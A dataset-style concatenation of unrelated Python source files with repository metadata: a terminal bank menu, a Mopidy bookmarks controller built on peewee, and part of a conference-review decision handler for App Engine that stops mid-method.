res_dict = res.json()
return res_dict
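# `login_info` is assumed to be any object exposing a getDict() method that
# returns the credentials payload, e.g. (hypothetical field names):
#   class LoginInfo:
#       def __init__(self, regno, passwd):
#           self.regno, self.passwd = regno, passwd
#       def getDict(self):
#           return {'regno': self.regno, 'passwd': self.passwd}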
| [
"[email protected]"
]
| |
720ea0442ba601347f0f785738e5a5cf39923cf8 | b4692ccd9b46fb661a70575f88fbc7de50a08eee | /test.py | 01008d40647fedaff9cfc0ac8e9b7105f8cea04d | []
| no_license | 18516264210/MachineLearning | 20383fae121c0abb0f86dd9e614074dce63b4eb5 | c0d60f24bfe75788a1b59ce1918d692f0e5c46d9 | refs/heads/master | 2021-04-04T01:43:25.870375 | 2020-03-19T04:56:21 | 2020-03-19T04:56:21 | 248,413,950 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 103 | py |
from printff import Printf
if __name__=="__main__":
p = Printf("zhang","19")
    p.new_print()
| [
"[email protected]"
]
| |
e5e03b4381e41a2e2b390040d6116fa7769744d3 | 2bb5f179db740ab6335fa1c221a80995857ad43a | /Unit1/Exercises/WeekendProjectTTeller/app/view.py | d11bad232a4166bf61f79a42a501e3ca08e89f1c | []
| no_license | acrainier1/BytePhase1 | 77cecce542012218317b8840b8ad74688bd9150c | 6c1db7fd5569540dcd7c4ba6932e25d2a709ac15 | refs/heads/master | 2020-08-27T11:32:35.189211 | 2019-11-22T00:19:10 | 2019-11-22T00:19:10 | 217,352,349 | 0 | 0 | null | 2019-10-24T17:11:16 | 2019-10-24T17:11:16 | null | UTF-8 | Python | false | false | 1,165 | py |
def print_login_menu():
print("""Welcome to Terminal Teller!:
1) create account
2) log in
3) quit
""")
def login_prompt():
return input("Your choice:")
def bad_login_input():
print("Input not recognized\n")
def goodbye():
print(" Goodbye!\n")
def print_main_menu(user):
print(f"""Hello, {user["first"]} {user["last"]} ({user["account_num"]})
1 Check balance
2 Withdraw funds
3 Deposit funds
4 Sign out
""")
def main_prompt():
return input("Your choice:") | [
"[email protected]"
]
| |
19991d7f0056982ff6ebada00d7bad44c64016e4 | c9ea085c1d74d4f989a72f7e5d1f59433ef31dd9 | /mopidy_bookmarks/controllers/bookmarks.py | 335828023e4b919a80d6b1cacc26e8ca9d26ac2a | [
"Apache-2.0"
]
| permissive | sapristi/mopidy-bookmarks | 08c615ae094846e9c89a4d9ede5a204599ca1f2b | 9babcc94b5099a86063e87830ce1026056c77747 | refs/heads/master | 2022-11-26T14:01:48.861863 | 2020-07-31T15:06:58 | 2020-07-31T15:06:58 | 276,175,116 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,724 | py | import logging
import pykka
import time
from peewee import (
Model,
SqliteDatabase,
IntegerField,
DoesNotExist,
)
from mopidy import models
from .generic import LTextField, JsonField, LimitError
logger = logging.getLogger(__name__)
class BookmarksController(pykka.ThreadingActor):
def __init__(self, dbfile, max_bookmarks, max_length):
super().__init__()
self.db = SqliteDatabase(None)
class Bookmark(Model):
name = LTextField(primary_key=True, max_length=100)
current_track = IntegerField(null=True)
current_time = IntegerField(null=True)
tracks = JsonField(max_length=max_length, null=True)
last_modified = IntegerField(null=True)
class Meta:
database = self.db
def to_mopidy_model(self):
track_models = [models.Track(**track) for track in self.tracks]
return models.Playlist(
uri=f"bookmark:{self.name}",
name=self.name,
tracks=list(track_models),
last_modified=self.last_modified,
)
self.Bookmark = Bookmark
self.max_bookmarks = max_bookmarks
self.dbfile = dbfile
def on_start(self):
self.db.init(self.dbfile)
self.db.create_tables([self.Bookmark])
def on_stop(self):
self.db.close()
def save(self, name, tracks):
bookmark, created = self.Bookmark.get_or_create(name=name)
if (
created
and self.max_bookmarks
and self.Bookmark.select().count() > self.max_bookmarks
):
raise LimitError(
f"Maximum number of bookmarks ({self.max_bookmarks}) reached."
)
bookmark.tracks = tracks
bookmark.current_track = None
bookmark.current_time = None
bookmark.last_modified = int(time.time())
bookmark.save()
return bookmark
def update(self, name, current_track, current_time):
bookmark = self.Bookmark[name]
bookmark.current_track = current_track
bookmark.current_time = current_time
bookmark.save()
def delete(self, name):
try:
bookmark = self.Bookmark[name]
bookmark.delete_instance()
return True
except DoesNotExist:
return False
def get(self, name):
try:
return self.Bookmark[name]
except DoesNotExist:
return None
def get_items(self, name):
bm = self.Bookmark[name]
return bm.tracks
def as_list(self):
return [bm.name for bm in self.Bookmark.select()]
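# Usage sketch (pykka): the controller runs as a threaded actor, e.g.
#   proxy = BookmarksController.start('/tmp/bookmarks.db', 100, 10000).proxy()
#   proxy.save('my list', tracks).get()
# (the path and limits here are hypothetical)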
| [
"[email protected]"
]
| |
ec6fcf93cc3d0262a6b7b598ec122b19591057aa | f217883abc9daffecdafec5794068a5ca6adb905 | /MathOperationsP5.py | 00acbad3dd8e167bf09f55a7b3f12b6cf98a3bff | []
| no_license | DamianVega/P1.HelloWorld | 693592cd4175118afcf34790958d3751f156ce21 | 9a636ac31e54481e6fcefe5e3ab7c2d0799d8003 | refs/heads/master | 2020-04-05T01:22:45.045323 | 2019-05-13T18:47:50 | 2019-05-13T18:47:50 | 156,433,921 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 561 | py | a = 25
b = 10
c = 7
# Adding
print("Display the sum of:",a,"+",c,"=",a+c)
# Subtracting
print("Display the difference of:",a,"-",c,"=",a-c)
# Multiplying
print("Display the multiplication of:",a,"*",c,"=",a*c)
# Division
print("Display the division of:",a,"/",c,"=",a/c)
# Integer Division
print("Display the integer division of:",a,"//",c,"=",a//c)
# The remainder of Integer Division, %
print("Display the remainder of integer division of:",a,"%",c,"=",a%c)
print(a, "Modulus",c,"=",a%c)
# Power of a Number
print("2 to the 5th power =",2**5) | [
"[email protected]"
]
| |
1a62fead2b8972b791603ecd96b75643fdc06101 | 2da14d080bf2e54b13b8b1b23aface9b755f94f0 | /zhichen/items.py | 559c21abeb923bdac3a8d22ccfe79ecef1bbb05c | []
| no_license | efdssdf/zhichen | 82bf6fe38d59b8ebc4f90e7c84709a3e6fee59d1 | 0a76d507af85b1efd7676aeafac6d2cba48b5e5f | refs/heads/master | 2020-04-08T07:36:23.988586 | 2018-11-26T09:40:28 | 2018-11-26T09:40:28 | 159,144,769 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 287 | py | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class ZhichenItem(scrapy.Item):
# define the fields for your item here like:
# name = scrapy.Field()
pass
| [
"[email protected]"
]
| |
34e6d9bd427d80013aeb40dfba6f4734f2d186e4 | e6bc1f55371786dad70313eb468a3ccf6000edaf | /Datasets/py-if-else/Correct/076.py | 2c07f238adcfd70b429c52cda3509dc1a5eb15ba | []
| no_license | prateksha/Source-Code-Similarity-Measurement | 9da92e3b22c372ed6ea54d8b6ab2c5921e8c41c0 | fb371b837917794d260a219a1ca09c46a5b15962 | refs/heads/master | 2023-01-04T07:49:25.138827 | 2020-10-25T14:43:57 | 2020-10-25T14:43:57 | 285,744,963 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 178 | py | #!/bin/python3
import sys
N = int(input().strip())
if(N%2==0) :
if (N<5 or N>20):
print('Not Weird')
else :
print ("Weird")
else :
print ("Weird") | [
"[email protected]"
]
| |
990724591460f6a3454e06b1a3df500f07f90241 | 58ee1dc37b57e0b4f06cf383c6a9e0654f490150 | /python-tflearn-git/lilac.py | 5214cab05f245eed7f14892fa3df205c85351b16 | []
| no_license | MikeyBaldinger/arch4edu | f3af87ef3a8d4cd78fde7e0ef75658c17dbe8c06 | c1775bf7fe0ffc87f3c8b4109fb1e8acde12a430 | refs/heads/master | 2022-12-23T16:40:55.513537 | 2020-09-28T21:00:59 | 2020-09-28T21:00:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 346 | py | #!/usr/bin/env python3
from lilaclib import *
maintainers = [{'github': 'petronny', 'email': 'Jingbei Li <[email protected]>'}]
update_on = [{'aur': None}, {'github': 'tflearn/tflearn'}, {'alias': 'python'}]
build_prefix = 'extra-x86_64'
pre_build = aur_pre_build
post_build = aur_post_build
if __name__ == '__main__':
single_main(build_prefix)
| [
"[email protected]"
]
| |
204330cf331d9714e480ff6aed9841c350a88aa2 | d9effdca7fcaf3ec7d5568d69476c181e7aa05cc | /00_scripts/06_04_bulkMoist.py | 5cc2100b448f587e4d337addf635652d5a0d1c8a | []
| no_license | Potopoles/MScTh | cac1013dea0d9935efa1bd5b6a30a7f339f3c9ac | 7fdd5b769fe9416c056f8b8003b8466547d9f71c | refs/heads/master | 2021-07-10T14:16:47.636015 | 2020-06-25T10:43:48 | 2020-06-25T10:43:48 | 151,584,506 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,504 | py | def plotVertProf(var_vP, varNCO, ax, meta):
zvals = varNCO.dims['altitude'].vals
zvals = np.expand_dims(zvals, 0)
zvals = np.repeat(zvals,len(subSpaceInds['diurnal']),axis=0)
PLOT = ax.plot(np.transpose(var_vP), np.transpose(zvals))
ax.axvline(x=0, color=(0.5,0.5,0.5), linestyle='-', linewidth=1)
ax.legend(PLOT, subSpaceInds['diurnal'])
ax.set_xlim([meta['min'], meta['max']])
ax.grid()
import os
os.chdir('00_scripts/')
i_resolutions = 3 # 1 = 4.4, 2 = 4.4 + 2.2, 3 = ...
i_plot = 2 # 0 = no plot, 1 = show plot, 2 = save plot
import matplotlib
if i_plot == 2:
matplotlib.use('Agg')
import matplotlib.pyplot as plt
inpPath = '../02_fields/subDomDiur'
plotOutDir = '../00_plots/06_bulk'
plotName = 'QVT_TOT.png'
import numpy as np
import ncClasses.ncObject as ncObject
profiles = {}
modes = ['', 'f']
if i_resolutions == 1:
ress = ['4.4']
elif i_resolutions == 2:
ress = ['4.4', '2.2']
elif i_resolutions == 3:
ress = ['4.4','2.2','1.1']
elif i_resolutions == 4:
ress = ['2.2']
elif i_resolutions == 5:
ress = ['1.1']
for res in ress:
print(res)
for mode in modes:
#mode = ''
print(mode)
subSpaceInds = {}
subSpaceInds['rlon'] = (50,100)
subSpaceInds['rlat'] = (20,57)
#subSpaceInds['rlon'] = (50,60)
#subSpaceInds['rlat'] = (30,40)
subSpaceInds['altitude'] = list(range(1,41))
subSpaceInds['diurnal'] = [0,3,6,9,12,15,18,21]
#subSpaceInds['diurnal'] = [3,9,15,21]
#subSpaceInds['diurnal'] = [21]
fact = 1
if res == '2.2':
fact = 2
elif res == '1.1':
fact = 4
if 'rlon' in subSpaceInds:
subSpaceInds['rlon'] = [x * fact for x in subSpaceInds['rlon']]
subSpaceInds['rlon'] = list(range(subSpaceInds['rlon'][0], subSpaceInds['rlon'][1]+1))
if 'rlat' in subSpaceInds:
subSpaceInds['rlat'] = [x * fact for x in subSpaceInds['rlat']]
subSpaceInds['rlat'] = list(range(subSpaceInds['rlat'][0], subSpaceInds['rlat'][1]+1))
from functions_06 import LoadField
LF = LoadField(inpPath, res, mode, subSpaceInds)
(RHO,rho) = LF.loadField('zRHO.nc', 'RHO')
#(W,w) = LF.loadField('zW.nc', 'W')
#(T,t) = LF.loadField('zT.nc', 'T')
(QVT_TOT,qvt_tot) = LF.loadField('zAQVT_TOT.nc', 'AQVT_TOT')
#(P,p) = LF.loadField('zP.nc', 'P')
from functions_06 import vertProf
# CALCULATE VERTICAL PROFILE
qvt_tot_vP = vertProf(qvt_tot*3600*1000, rho)
profiles[str(res+mode)] = qvt_tot_vP
pltMeta = {}
pltMeta['max'] = -np.Inf
pltMeta['min'] = np.Inf
for key,vals in profiles.items():
if np.nanmax(vals) > pltMeta['max']:
pltMeta['max'] = np.nanmax(vals)
if np.nanmin(vals) < pltMeta['min']:
pltMeta['min'] = np.nanmin(vals)
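# pltMeta now holds the global min/max across all profiles, so every subplot
# below shares the same x-axis limits.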
fig, axes = plt.subplots(ncols=3, nrows=2, figsize=(16,8))
plotVertProf(profiles['4.4f'], RHO, axes[0,0], pltMeta)
plotVertProf(profiles['4.4'], RHO, axes[1,0], pltMeta)
if '2.2' in ress:
plotVertProf(profiles['2.2f'], RHO, axes[0,1], pltMeta)
plotVertProf(profiles['2.2'], RHO, axes[1,1], pltMeta)
if '1.1' in ress:
plotVertProf(profiles['1.1f'], RHO, axes[0,2], pltMeta)
plotVertProf(profiles['1.1'], RHO, axes[1,2], pltMeta)
if i_plot == 1:
plt.show()
elif i_plot == 2:
plotPath = plotOutDir + '/' + plotName
plt.savefig(plotPath, format='png', bbox_inches='tight')
| [
"[email protected]"
]
| |
54073a0a96169761ca6e309c1f572aa135b71df0 | 682319f56c17e949bab0d6e418838d33977dd760 | /RP/search_element.py | 6bddc659f268253cf4d1a9296c7704a8a0a4f81b | []
| no_license | DilipBDabahde/PythonExample | 8eb70773a783b1f4b6cf6d7fbd2dc1302af8aa1b | 669762a8d9ee81ce79416d74a4b6af1e2fb63865 | refs/heads/master | 2020-08-23T01:05:44.788080 | 2020-07-25T21:59:52 | 2020-07-25T21:59:52 | 216,511,985 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,431 | py | '''
Write a program which accepts N numbers from the user and stores them in a list. Accept another number from the user and
return the frequency of that number in the list.
input: Num of elements: 12
input Elements: 5 8 6 8 5 9 3 7 2 21 1 5
Element to search = 5
output: Freq of search element is: 3
'''
def search_Element(arr, iNo):
    if len(arr) == 0:  # empty list -> signal invalid input
        return -1;
    icnt = 0; # icnt counts how many times the element occurs
    for i in range(0, len(arr)):
        if arr[i] == iNo:
            icnt = icnt + 1;
    return icnt;
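# Note: the built-in list method does the same job in one call: arr.count(iNo)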
def main():
    arr_list = list(); # arr_list collects the elements entered by the user
    size = input("Enter list size: ");
    size = int(size); # type conversion of size from str to int
    print("Enter elements for list");
    for i in range(0, size):
        no = input("Enter element: ");
        no = int(no); # type conversion
        arr_list.append(no); # append the element to the list
    # now our list is created using loop iteration
    print("Created list is: ", arr_list);
    search_var = input("Enter number to search its freq:");
    search_var = int(search_var);
    result = search_Element(arr_list, search_var);
    if result > 0:
        print("Freq of given variable in list is: ", result);
    elif result == 0:
        print("Element not found in list");
    else:
        print("Invalid input");
if __name__ == "__main__":
    main();
| [
"[email protected]"
]
| |
1fcc808e5c396da1120452e56d1413f1fbbc350a | 66735869ad5468454f96f4dd5fd4dc2df29ec1c3 | /netParams.py | d7b85a0a5c5171186ab9852d8aae2035cdffa262 | []
| no_license | joewgraham/spinalcord | 6b4f98c92105fc8fe5c3184450123f1e85ff7834 | 0e8956280a80a355372ffef0a01e839d1789e2a4 | refs/heads/master | 2022-11-24T13:27:45.482318 | 2020-07-23T03:36:19 | 2020-07-23T03:36:19 | 281,727,379 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,825 | py | from netpyne import specs, sim
try:
from __main__ import cfg
except:
from cfg import cfg
netParams = specs.NetParams()
netParams.propVelocity = 100.0 # propagation velocity (um/ms)
netParams.probLengthConst = 100 # length constant for conn probability (um)
netParams.defaultThreshold = cfg.defaultThreshold # voltage threshold to count as a spike (mV)
netParams.popParams['LF1'] = {
"cellModel": "",
"cellType": "mn_s",
"numCells": 100,
"xRange": [-200, -300],
"yRange": [0, 10000],
"zRange": [0, 100],
"pop": "LF",
"xnormRange": [-2.0, -3.0],
"ynormRange": [0.0, 100.0],
"znormRange": [0.0, 1.0],
}
netParams.popParams['LF2'] = {
"cellModel": "",
"cellType": "mn_s",
"numCells": 100,
"xRange": [-200, -300],
"yRange": [5000, 15000],
"zRange": [0, 100],
"pop": "LF",
"xnormRange": [-2.0, -3.0],
"ynormRange": [0.0, 100.0],
"znormRange": [0.0, 1.0],
}
netParams.popParams['LF3'] = {
"cellModel": "",
"cellType": "mn_s",
"numCells": 100,
"xRange": [-200, -300],
"yRange": [10000, 20000],
"zRange": [0, 100],
"pop": "LF",
"xnormRange": [-2.0, -3.0],
"ynormRange": [0.0, 100.0],
"znormRange": [0.0, 1.0],
}
netParams.cellParams['mn_s'] = {
"conds": {},
"secs": {
"soma": {
"geom": {
"diam": 5,
"L": 5,
"Ra": 150.0,
"cm": 1,
},
"mechs": {
"pas": {
"g": cfg.pas_g,
"e": cfg.pas_e,
},
"namot": {
"gbar": cfg.namot_gbar, # Default: 0.02
},
"kamot": {
"gbar": cfg.kamot_gbar, # Default: 0.02
},
"kdrmot": {
"gbar": cfg.kdrmot_gbar, # Default: 0.02
},
},
},
},
}
netParams.synMechParams['exc'] = {
"mod": "Exp2Syn",
"tau1": 0.1,
"tau2": 1,
"e": 0
}
# cfg overrides used by the probability rule below; they must be assigned
# before the dict is built, because str(cfg.distScale) and str(cfg.connScale)
# are interpolated into the string immediately.
cfg.connScale = 1.0
cfg.distScale = 10.0

netParams.connParams['mn->mn'] = {
"preConds": {"cellType": ["mn_s"]},
"postConds": {"cellType": ["mn_s"]},
"synsPerConn": 1,
"synMech": "exc",
"probability": str(cfg.distScale) + "* probLengthConst/(probLengthConst + dist_3D *" + str(cfg.distScale) + ") *" + str(cfg.connScale),
"weight": cfg.connWeight,
"delay": "dist_3D/10",
}
netParams.stimSourceParams['IClamp0'] = {
"type": "IClamp",
"del": cfg.IClamp0_del,
"dur": cfg.IClamp0_dur,
"amp": cfg.IClamp0_amp,
}
netParams.stimTargetParams['IClamp0->target'] = {
"source": "IClamp0",
"conds": cfg.IClamp0_conds,
"sec": cfg.IClamp0_sec,
"loc": cfg.IClamp0_loc,
}
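# Typical NetPyNE entry point for this netParams/cfg pair (sketch):
#   sim.createSimulateAnalyze(netParams=netParams, simConfig=cfg)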
| [
"[email protected]"
]
| |
f8d452fb3157f7facf9a23c27cb5b31e1d5c8b91 | b96b7ba35f4bac232f195adcd50a63433d88880a | /tracking.py | dadf9bf1fe598c50351e4ea8903010bcb508ca93 | []
| no_license | meexwaal/MarkOffProcessor | 72c54178b56b0dc22ebf6491de5488cb7dc16a1b | 7c2f88d8328c104626056efa202851248dc17eaa | refs/heads/master | 2021-09-04T17:56:19.169067 | 2018-01-20T20:59:48 | 2018-01-20T20:59:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18 | py | opencv/tracking.py | [
"[email protected]"
]
| |
b80e6678bdec542511a639a79632f094d5382c60 | a0e94248c539b087342ccab59c4edef99e3c8f80 | /main.py | 8e6c2bc875f89f44d1f588841bf44309051404ff | []
| no_license | Pawanpathak4/spychat | 6389d40cd03ad6c9771f74ae17f086a4cd5729bc | bbf95dba45923f329bb3eb91f11948304831aaf2 | refs/heads/master | 2020-03-09T09:33:12.074066 | 2018-04-09T05:11:24 | 2018-04-09T05:11:24 | 128,715,363 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,716 | py | ############spychat5555########
def entry():
name = raw_input("What's your spy name??")
if len(name) > 0:
print("Yay, the name is good.")
salutation = raw_input("What would be your spy salutation, Mr. ,Mrs or Ms.")
full_name = salutation + " " + name
print("Alright " + full_name + ", I would like to know little more about you....")
age = int(raw_input("what's your age?"))
if 20 < age < 50:
print("Alright,")
rating = float(raw_input("whats ur Spy rating??"))
if 2.5 <= rating < 3.5:
print(" U can always do better")
elif 3.5 <= rating < 4.5:
print("Yup, you are one of good ones")
elif rating >= 4.5:
print("Ooo, thts an ace")
else:
print("We can always use somebody to help in the office.")
            ol = bool(raw_input("Are u online???"))
            # Note: bool() of raw_input is only False for empty input; any
            # non-empty answer (even "no") evaluates True.
            if ol == False:
                print("Authentication complete, welcome " + full_name + " with age " + repr(age) + " and rating of " + repr(rating) + ". Proud to have you on board")
else:
print(" ")
else:
print("Sorry you are not of the correct age to be a spy")
exit()
else:
print("This name is not valid please try with a better name")
def spy_chat():
show_menu = True
current_status_message = None
while show_menu:
print("What do you want to do?")
menu_choices = "1. Add a status update \n2. Add a friend \n3. Exit the Application\nInput :- "
menuchoice = raw_input(menu_choices)
if menuchoice == "1":
current_status_message = add_status(current_status_message)
elif menuchoice == "2":
no = add_friend()# no of friends returned
print("No of friends : %d" % no)
elif menuchoice== '3':
print("QUITTING....")
show_menu = False
else:
print("invalid input")
pass
def add_status(current_status_message):
if current_status_message is not None:
print("Your current status is : %s" % current_status_message)
else:
print("You don't have any status right now")
default =raw_input( "Do you want to select from the previous status??(Y/N)")
if default.upper() == 'N':
new_status_message = raw_input("Which status you want to set ??")
if len(new_status_message) > 0:
updated_status_message = new_status_message# updates status
STATUS_MESSAGES.append(updated_status_message) # Entered in the list
else:
print("Please enter a valid status...")#invalid status
updated_status_message = current_status_message # assign previous status
elif default.upper() == 'Y':
item_position = 1
for message in STATUS_MESSAGES:
print("%d . %s" % (item_position, message))
item_position = item_position + 1
menu_selection = int(raw_input("What is your desired status?"))
if len(STATUS_MESSAGES) >= menu_selection:
updated_status_message = STATUS_MESSAGES[menu_selection - 1]# set desired status
else:
print("invalid input...")
updated_status_message = current_status_message # assign previous status
else:
print("invalid input")
pass
return updated_status_message
def add_friend():
new_name = raw_input("Whats your friend spy name?")
new_salutation =raw_input("what would be the salutation, Mr. or Mrs??")
new_name = new_salutation + " " + new_name
new_age = int(raw_input("what is friends age?"))
new_rating = float(raw_input("what's your friend spy rating??"))
if len(new_name)>0 and 12 < new_age < 50: ### add friend
Friend_name.append(new_name)
Friend_age.append(new_age)
Friend_rating.append(new_rating)
Friend_status.append(True)
else: ##invalid details
print("Sorry we can't add your friend's details please try again")
return len(Friend_name)
user = raw_input("Do you want to continue with the default user ?(Y/N)")
new_user = 0
if user.upper() == 'Y':
from spy_details import name
from spy_details import salutation
from spy_details import age
from spy_details import rating
print('Welcome,%s %s with %d years of age and %.1f rating. Welcome to spychat.... ' %
(salutation, name, age, rating))
else:
new_user = 1
entry()
STATUS_MESSAGES =['Mandir wahin banaenge...', 'Jai shree RAM']
Friend_name = []
Friend_age = []
Friend_rating = []
Friend_status = []
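# spy_chat() is defined above but never invoked; calling it here appears to
# be the intended entry point (assumed fix).
spy_chat()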
| [
"[email protected]"
]
| |
2f043528a38c9588efa20f5f3d70aeed5298c733 | 6ff5e37147419b5ed5ee43a6654bf2bc8d6f5779 | /printTree.py | ebc7c00a98b0ea95dfa91e3bcf56708872eafcf8 | []
| no_license | ashageorgesj/LeetCode | 982fcdf5265ce98c02a27a7b55ff4273c4875dcd | afb8c8fbfa3f3a08d70c4fa12ab82bcb601bbb2d | refs/heads/master | 2021-05-21T04:19:45.314378 | 2021-02-05T07:13:58 | 2021-02-05T07:13:58 | 252,539,269 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,332 | py | from typing import List
class Node:
    def __init__(self, val="", children=None):
        # Use None as the default to avoid the shared mutable-default pitfall,
        # and honor the argument instead of discarding it.
        self.val = val
        self.children = children if children is not None else []
class Solution:
def findHierarchy(array:List[List[str]]):
# Find top level parent:
top = set()
children = []
mydict = {}
#print(array)
for member in array:
#print(member)
children.append(member[1])
if member[0] not in mydict:
mydict[member[0]] = []
mydict[member[0]].append(member[1])
for member in array:
if member[0] not in children:
top.add(member[0])
print(mydict)
def buildTree(parent,childNames):
nonlocal mydict
if not parent or len(childNames) == 0:
return
for children in childNames:
print(children)
newNode = Node(children)
if children in mydict:
buildTree(newNode,mydict[children])
parent.children.append(newNode)
top = list(top)
root = Node(top[0])
buildTree(root,mydict[top[0]])
def print_tree(root,space):
if root:
print(" "*space + root.val)
if len(root.children) > 0:
for child in root.children:
print_tree(child,space*2)
print_tree(root,1)
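    # For the sample call below, print_tree renders the hierarchy roughly as:
    #  Computers
    #   Apple
    #     iMac
    #   Acer
    #     Aspire
    #   HP
    #     Pavilion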
    #Solution.findHierarchy([["Computers","Apple"],["Apple","iMac"],["Computers","Acer"],["Acer","Aspire"],["Computers","HP"],["HP","Pavilion"]])
| [
"[email protected]"
]
| |
fdfc672d12f9c86098112c591150ba65cb65eadc | f9e379b6183376699a270cf90a1472d3d20da3e0 | /travel/apps/cities/urls.py | 9312df2242babfe28b56b7428ea77380a5f15522 | []
| no_license | tuxubaev17/Travel | d60627a8d111a30bbdc98027c278d8b616630131 | a885b3b5ebddf0f20e2f68d6279561a91f74028b | refs/heads/master | 2023-04-29T07:30:46.586047 | 2020-01-19T08:22:33 | 2020-01-19T08:22:33 | 226,667,476 | 0 | 0 | null | 2023-04-21T20:43:45 | 2019-12-08T12:54:48 | Python | UTF-8 | Python | false | false | 480 | py | from django.urls import path
from .views import (home, CityDetailView, CityCreateView,
CityUpdateView, CityDeleteView)
app_name = "city"
urlpatterns = [
path('', home, name='home'),
path('detail/<int:pk>/', CityDetailView.as_view(), name='detail'),
path('add/', CityCreateView.as_view(), name='add'),
path('update/<int:pk>/', CityUpdateView.as_view(), name='update'),
path('delete/<int:pk>/', CityDeleteView.as_view(), name='delete'),
]
| [
"[email protected]"
]
| |
3628f604b1aba3e9e2c220706799292b5ac0944b | d79a6dc4bef743e2cd503a8c05b64a00476f6a32 | /02_01/begin/readInData.py | e4589d9d5658e2d3778d4a91d5efa18e13dc163d | []
| no_license | thuhuong262hd/scripting_for_tester | 2e5aa8cad9e97e4557d69d70de3406545e8839da | 1b5fed9468e5518f2cba9391f7166547d93524b3 | refs/heads/master | 2023-03-22T01:19:32.130118 | 2021-03-11T06:59:56 | 2021-03-11T06:59:56 | 342,200,119 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 823 | py | import csv
#final desired format
# - Charts [["Test Name",<diff from avg>]]
# - spreadsheet [["Test Name",<current run time>]]
timing_data = []
with open('TestTimingData.csv') as csv_file:
file_reader = csv.reader(csv_file)
for row in file_reader:
timing_data.append(row)
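# csv.DictReader would expose these rows by column name (row['Test Name'])
# instead of by position, an alternative to the index math below.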
column_chart_data = [["Test Name", "Diff from Avg"]]
table_data = [["Test Name", "Run Time (s)"]]
#[1:] start from 1 to end
for row in timing_data[1:]:
test_name = row[0]
if not row[1] or not row[2]:
continue
current_run_time = float(row[1])
avg_run_time = float(row[2])
diff_from_avg = avg_run_time - current_run_time
column_chart_data.append([test_name,diff_from_avg])
table_data.append([test_name,current_run_time])
print (column_chart_data)
print (table_data)
| [
"[email protected]"
]
| |
e24d433767d920ff680b986ff07f6b0f6fe496bf | 61863803f0e010020f0a7ff0210e86809b94e965 | /day4/raspberrypi-codes/button-led/button-interfacing.py | f80e1efdafda5babfe46df5d4ca91093836b7735 | []
| no_license | maddydevgits/bitspilani-hyd-iot-bootcamp | 1aa23d4584bddec188996da60ab58675c30b1f3a | 44c64caaf247360252f6d9d9ccf868b1bc5a218e | refs/heads/main | 2023-06-23T23:41:00.534483 | 2021-07-30T16:24:10 | 2021-07-30T16:24:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 323 | py | # sudo python3 rpi-button-led.py
import RPi.GPIO as GPIO
GPIO.setmode(GPIO.BCM)
GPIO.setup(2, GPIO.IN) # BUTTON (OC - 1, CC - 0)
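# Assumes an external pull-up on GPIO2 (so an open circuit reads 1); without
# one, the internal pull-up could be enabled instead:
#   GPIO.setup(2, GPIO.IN, pull_up_down=GPIO.PUD_UP)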
GPIO.setup(21, GPIO.OUT) # LED (0 - ON, 1 - OFF)
while True: # Infinite Loop
if GPIO.input(2): # reading the data from GPIO2
GPIO.output(21,1) # OFF
else:
GPIO.output(21,0) # ON
| [
"[email protected]"
]
| |
850985fddff858e55bfd488b48ba7aff47e39da6 | fbf73800e27f66960f677a284c2771e66708973b | /subreview_lib/classicreviewdecisionpage.py | dfbc360e28ba50b5a16d59e1c83ece7bce6d2c65 | [
"MIT"
]
| permissive | allankellynet/mimas | 94140a341693d4729b3cdf5ea94ef2f7e550aad6 | 10025d43bba9e84f502a266760786842e7158a05 | refs/heads/master | 2022-05-30T21:35:06.083902 | 2020-02-27T14:04:27 | 2020-02-27T14:04:27 | 235,146,506 | 0 | 0 | MIT | 2022-05-25T04:56:13 | 2020-01-20T16:30:39 | Python | UTF-8 | Python | false | false | 3,568 | py | #-----------------------------------------------------
# Mimas: conference submission and review system
# (c) Allan Kelly 2016-2020 http://www.allankelly.net
# Licensed under MIT License, see LICENSE file
# -----------------------------------------------------
# System imports
# Google imports
import logging
from google.appengine.ext import ndb
# Local imports
import roundreviews
import basehandler
from submission_lib import submissionrecord
class ClassicReviewDecisionPage(basehandler.BaseHandler):
def make_page(self, crrt_conf):
review_round = int(self.request.get("round"))
tracks = crrt_conf.mapped_track_obects()
crrt_track = self.request.get("track", default_value=tracks.keys()[0])
submissions = self.sorted_submissions(crrt_conf, crrt_track, review_round)
template_values = {
'crrt_conf': crrt_conf,
"track_objects": tracks,
"crrt_track": crrt_track,
"submissions": submissions,
"submissions_len": len(submissions),
"decisions": submissionrecord.get_decision_summary(crrt_conf.key, crrt_track, review_round),
"decision_maker": crrt_conf.user_rights().has_decision_right_for_round(
self.get_crrt_user().email(), review_round),
"review_round": review_round,
"track_slots": crrt_conf.mapped_track_obects()[crrt_track].slots,
}
self.write_page('subreview_lib/classicreviewdecisionpage.html', template_values)
def sorted_submissions(self, crrt_conf, crrt_track, review_round):
submissions = submissionrecord.retrieve_conference_submissions_by_track_and_round(
crrt_conf.key, crrt_track, review_round)
if self.request.params.has_key("mean"):
sorted = submissionrecord.sort_submissions_by_mean_high_to_low(submissions, review_round)
else:
sorted = submissionrecord.sort_submissions_by_total_high_to_low(submissions, review_round)
return sorted
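        # A "mean" query parameter switches the ordering from total review
        # score to mean score (both high to low); note that the local name
        # "sorted" shadows the builtin within this method.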
def get(self):
if not (self.session.has_key("crrt_conference")):
logging.debug("Conference key session variable missing")
return
crrt_conf = ndb.Key(urlsafe=self.session["crrt_conference"]).get()
self.make_page(crrt_conf)
def submit_decisions(self, review_round):
if not (self.session.has_key("crrt_conference")):
logging.debug("Conference key session variable missing")
return
roundreviews.submit_decisions(
ndb.Key(urlsafe=self.session["crrt_conference"]),
self.request.get("tracklist"),
review_round,
self.request)
def decline_no_decisions(self, review_round):
